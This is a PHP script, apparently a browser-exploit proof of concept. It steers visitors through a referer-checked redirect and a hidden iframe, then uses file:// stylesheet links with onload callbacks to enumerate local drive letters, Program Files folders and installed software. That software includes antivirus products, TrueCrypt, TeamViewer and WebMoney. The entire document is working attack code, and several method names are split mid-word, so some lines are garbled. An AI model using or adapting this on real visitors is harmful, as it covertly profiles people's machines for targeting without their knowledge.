<?php if(isset($_GET['p']) && empty($_SERVER['HTTP_REFERER'])) { header('Location: ?'); die(); } if(isset($_GET['r'])) { echo '<html> <header><meta http-equiv=\'Refresh\' content=\'0; url=?p=' . (int)$_GET['r'] . '\'/></header> <body onload="location.replace(\'?p=' . (int)$_GET['r'] . '\')"></body> </html>'; die(); } if(stripos($_SERVER['HTTP_REFERER'], '?r=') !== false) { print_page(); } else if(isset($_GET['p'])) { header('HTTP/1.0 404 Not Found'); } else { $rnd = rand(1, 9999); echo '<html> <header><script>function a(){ location.replace(\'?r=' . $rnd . '\');}</script></header> <body><iframe onload="setTimeout(\'a();\', 300)" src="?p=' . $rnd . '" style="width:0px;height:0px;visibility:hidden"></iframe></body> </html>'; } function print_page() { echo <<<QWERTY <html> <body> <script> var diskStr = 'CDEFGHIJKLMNOPQRSTUVWXYZ'; var goodDiskStr = ''; var diskDiv = document.createElement('div'); diskDiv.innerHTML = '<b>disks:</b><br>'; document.body.appendChild(diskDiv); var dirArr = new Array( 'program files', 'program files (x86)' ); var goodDirArr = new Array(); var dirDiv = document.createElement('div'); dirDiv.innerHTML = '<br><b>program folders:</b><br>'; document.body.appendChild(dirDiv); var progArr = new Array( 'adobe', 'akelpad', 'alcohol soft', 'avira', 'charles', 'daemon tools lite', 'drweb', 'eset', 'filezilla ftp client', 'filezilla ftp server', 'icq7.1', 'icq7.2', 'icq7.3', 'icq7.4', 'icq7.5', 'icq7.6', 'icq7.7', 'kaspersky lab', 'mcafee', 'microsoft office', 'microsoft visual studio', 'microsoft.net', 'mozilla firefox', 'nmap', 'nvidia corporation', 'notepad++', 'psi+', 'paragon software', 'qip', 'qip2010', 'qip2011', 'skype', 'teamviewer', 'total commander', 'truecrypt', 'utorrent', 'webmoney', 'winpcap', 'winrar', 'wireshark' ); var progDiv = document.createElement('div'); progDiv.innerHTML = '<br><b>programs:</b><br>'; document.body.appendChild(progDiv); function goodDisk(diskLetter) { goodDiskStr += diskLetter; diskDiv.innerHTML += diskLetter + ':<br>'; } function goodDir(dirName) { goodDirArr.push(dirName); dirDiv.innerHTML += dirName + '<br>'; } function goodProg(progName) { progDiv.innerHTML += progName + '<br>'; } onload = function checkDisk() { for(var i in diskStr) { var newLink = document.createElement('link'); newLink.id = Math.random(); newLink.rel = 'stylesheet'; newLink.href = 'file://' + diskStr[i] + ':/*'; newLink.onload = 'goodDisk(\'' + diskStr[i] + '\')'; diskDiv.appendChild(newLink); setTimeout('diskDiv.removeChild(document.getElemen tById(\'' + newLink.id + '\'))', 2000); } setTimeout('checkDir()', 500); } function checkDir() { for(var i in goodDiskStr) { for(var j in dirArr) { var newLink = document.createElement('link'); newLink.id = Math.random(); newLink.rel = 'stylesheet'; newLink.href = 'file://' + goodDiskStr[i] + ':/' + dirArr[j]; newLink.onload = 'goodDir(\'' + goodDiskStr[i] + ':/' + dirArr[j] + '\')'; dirDiv.appendChild(newLink); setTimeout('dirDiv.removeChild(document.getElement ById(\'' + newLink.id + '\'))', 2000); } } setTimeout('checkProg()', 500); } function checkProg() { for(var i in goodDirArr) { for(var j in progArr) { var newLink = document.createElement('link'); newLink.id = Math.random(); newLink.rel = 'stylesheet'; newLink.href = 'file://' + goodDirArr[i] + '/' + progArr[j]; newLink.onload = 'goodProg(\'' + goodDirArr[i] + '/' + progArr[j] + '/\')'; dirDiv.appendChild(newLink); setTimeout('dirDiv.removeChild(document.getElement ById(\'' + newLink.id + '\'))', 2000); } } } </script> </body> </html> QWERTY; } ?>